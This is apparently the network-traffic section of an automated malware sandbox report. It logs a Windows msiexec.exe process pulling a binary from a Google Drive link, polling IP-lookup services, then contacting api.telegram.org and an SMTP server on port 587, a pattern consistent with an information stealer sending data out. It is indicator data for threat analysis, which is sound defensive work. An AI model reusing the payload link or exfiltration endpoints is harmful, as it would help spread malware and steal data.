Jan 11, 2025 00:07:45.916392088 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:07:45.918802023 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:07:51.594870090 CET	49983	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:52.434592009 CET	49998	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:07:52.439446926 CET	587	49998	82.194.91.193	192.168.2.10
Jan 11, 2025 00:07:52.439599037 CET	49998	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:08:00.259912968 CET	587	49998	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:00.260166883 CET	49998	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:08:00.264970064 CET	587	49998	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:00.477761030 CET	587	49998	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:00.478063107 CET	49998	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:08:00.482851982 CET	587	49998	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:00.682663918 CET	587	49998	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:00.682952881 CET	49998	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:08:00.687743902 CET	587	49998	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:02.455560923 CET	587	49998	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:02.455827951 CET	49998	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:08:02.460691929 CET	587	49998	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:02.655241966 CET	587	49998	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:02.655596972 CET	49998	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:08:02.657309055 CET	587	49998	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:02.657360077 CET	49998	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:08:02.658595085 CET	49999	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:08:02.658649921 CET	443	49999	149.154.167.220	192.168.2.10
Jan 11, 2025 00:08:02.658710957 CET	49999	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:08:02.658992052 CET	49999	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:08:02.659004927 CET	443	49999	149.154.167.220	192.168.2.10
Jan 11, 2025 00:08:02.660433054 CET	587	49998	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:03.349705935 CET	443	49999	149.154.167.220	192.168.2.10
Jan 11, 2025 00:08:03.369546890 CET	49999	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:08:03.369575024 CET	443	49999	149.154.167.220	192.168.2.10
Jan 11, 2025 00:08:03.369744062 CET	49999	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:08:03.369750977 CET	443	49999	149.154.167.220	192.168.2.10
Jan 11, 2025 00:08:03.698956966 CET	443	49999	149.154.167.220	192.168.2.10
Jan 11, 2025 00:08:03.699039936 CET	443	49999	149.154.167.220	192.168.2.10
Jan 11, 2025 00:08:03.699081898 CET	49999	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:08:03.699409962 CET	49999	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:08:05.223047972 CET	50000	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:08:05.227937937 CET	587	50000	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:05.228044033 CET	50000	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:08:05.828849077 CET	587	50000	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:05.829058886 CET	50000	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:08:05.833978891 CET	587	50000	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:06.030777931 CET	587	50000	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:06.031033039 CET	50000	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:08:06.036098003 CET	587	50000	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:10.251218081 CET	587	50000	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:10.251497030 CET	50000	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:08:10.256386995 CET	587	50000	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:12.460294008 CET	587	50000	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:12.461553097 CET	50000	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:08:12.466413975 CET	587	50000	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:12.660594940 CET	587	50000	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:12.660821915 CET	50000	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:08:12.662488937 CET	587	50000	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:12.662532091 CET	50000	587	192.168.2.10	82.194.91.193
Jan 11, 2025 00:08:12.663331985 CET	50001	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:08:12.663377047 CET	443	50001	149.154.167.220	192.168.2.10
Jan 11, 2025 00:08:12.663497925 CET	50001	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:08:12.663805008 CET	50001	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:08:12.663813114 CET	443	50001	149.154.167.220	192.168.2.10
Jan 11, 2025 00:08:12.665586948 CET	587	50000	82.194.91.193	192.168.2.10
Jan 11, 2025 00:08:13.279661894 CET	443	50001	149.154.167.220	192.168.2.10
Jan 11, 2025 00:08:13.281357050 CET	50001	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:08:13.281377077 CET	443	50001	149.154.167.220	192.168.2.10
Jan 11, 2025 00:08:13.281482935 CET	50001	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:08:13.281487942 CET	443	50001	149.154.167.220	192.168.2.10
Jan 11, 2025 00:08:13.518482924 CET	443	50001	149.154.167.220	192.168.2.10
Jan 11, 2025 00:08:13.518686056 CET	443	50001	149.154.167.220	192.168.2.10
Jan 11, 2025 00:08:13.518825054 CET	50001	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:08:13.519186020 CET	50001	443	192.168.2.10	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 00:07:27.497538090 CET	51362	53	192.168.2.10	1.1.1.1
Jan 11, 2025 00:07:27.504249096 CET	53	51362	1.1.1.1	192.168.2.10
Jan 11, 2025 00:07:28.745157003 CET	54603	53	192.168.2.10	1.1.1.1
Jan 11, 2025 00:07:28.752378941 CET	53	54603	1.1.1.1	192.168.2.10
Jan 11, 2025 00:07:32.546581984 CET	55617	53	192.168.2.10	1.1.1.1
Jan 11, 2025 00:07:32.554038048 CET	53	55617	1.1.1.1	192.168.2.10
Jan 11, 2025 00:07:33.858896017 CET	51809	53	192.168.2.10	1.1.1.1
Jan 11, 2025 00:07:33.867261887 CET	53	51809	1.1.1.1	192.168.2.10
Jan 11, 2025 00:07:45.023907900 CET	63582	53	192.168.2.10	1.1.1.1
Jan 11, 2025 00:07:45.030822039 CET	53	63582	1.1.1.1	192.168.2.10
Jan 11, 2025 00:07:51.822766066 CET	50213	53	192.168.2.10	1.1.1.1
Jan 11, 2025 00:07:52.433075905 CET	53	50213	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 00:07:27.497538090 CET	192.168.2.10	1.1.1.1	0xf216	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:28.745157003 CET	192.168.2.10	1.1.1.1	0x14b1	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:32.546581984 CET	192.168.2.10	1.1.1.1	0x41cf	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:33.858896017 CET	192.168.2.10	1.1.1.1	0x8fa3	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:45.023907900 CET	192.168.2.10	1.1.1.1	0x36bb	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:51.822766066 CET	192.168.2.10	1.1.1.1	0x7948	Standard query (0)	mail.abraher.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 00:06:26.020108938 CET	1.1.1.1	192.168.2.10	0xb0b8	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 00:06:26.020108938 CET	1.1.1.1	192.168.2.10	0xb0b8	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:27.504249096 CET	1.1.1.1	192.168.2.10	0xf216	No error (0)	drive.google.com		142.250.184.238	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:28.752378941 CET	1.1.1.1	192.168.2.10	0x14b1	No error (0)	drive.usercontent.google.com		142.250.181.225	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:32.554038048 CET	1.1.1.1	192.168.2.10	0x41cf	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 00:07:32.554038048 CET	1.1.1.1	192.168.2.10	0x41cf	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:32.554038048 CET	1.1.1.1	192.168.2.10	0x41cf	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:32.554038048 CET	1.1.1.1	192.168.2.10	0x41cf	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:32.554038048 CET	1.1.1.1	192.168.2.10	0x41cf	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:32.554038048 CET	1.1.1.1	192.168.2.10	0x41cf	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:33.867261887 CET	1.1.1.1	192.168.2.10	0x8fa3	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:33.867261887 CET	1.1.1.1	192.168.2.10	0x8fa3	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:33.867261887 CET	1.1.1.1	192.168.2.10	0x8fa3	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:33.867261887 CET	1.1.1.1	192.168.2.10	0x8fa3	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:33.867261887 CET	1.1.1.1	192.168.2.10	0x8fa3	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:33.867261887 CET	1.1.1.1	192.168.2.10	0x8fa3	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:33.867261887 CET	1.1.1.1	192.168.2.10	0x8fa3	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:45.030822039 CET	1.1.1.1	192.168.2.10	0x36bb	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:52.433075905 CET	1.1.1.1	192.168.2.10	0x7948	No error (0)	mail.abraher.com	abraher.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 00:07:52.433075905 CET	1.1.1.1	192.168.2.10	0x7948	No error (0)	abraher.com		82.194.91.193	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49980	132.226.247.73	80	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:32.563517094 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 00:07:33.236788034 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 00:07:33.242609978 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 00:07:33.452517986 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 00:07:34.599915981 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 00:07:34.812510967 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49983	132.226.247.73	80	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:35.448026896 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 00:07:36.149410009 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49985	132.226.247.73	80	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:36.812865019 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 00:07:37.586335897 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49987	132.226.247.73	80	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:38.190526962 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 00:07:38.880357027 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49989	132.226.247.73	80	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:39.510941982 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 00:07:40.288095951 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49991	132.226.247.73	80	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:40.902813911 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 00:07:41.576138973 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49993	132.226.247.73	80	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:42.284938097 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 00:07:42.972179890 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49995	132.226.247.73	80	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:43.620126009 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 00:07:44.300144911 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:07:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49978	142.250.184.238	443	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:07:28 UTC	216	OUT	GET /uc?export=download&id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-10 23:07:28 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 23:07:28 GMT Location: https://drive.usercontent.google.com/download?id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-25xzzes9FsJ5c5ri_xCTnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49979	142.250.181.225	443	5752	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:07:29 UTC	258	OUT	GET /download?id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-10 23:07:31 UTC	4941	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC5r6mmco13LEUHc4gSJrDKWis9ZtOg_qomI2mRQ32xM_o9JpX1fhvNptZ16SOlAfAFrICOSngM Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="EfhhZmQaVp101.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 277056 Last-Modified: Mon, 09 Dec 2024 11:07:00 GMT Date: Fri, 10 Jan 2025 23:07:31 GMT Expires: Fri, 10 Jan 2025 23:07:31 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=ajME7Q== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
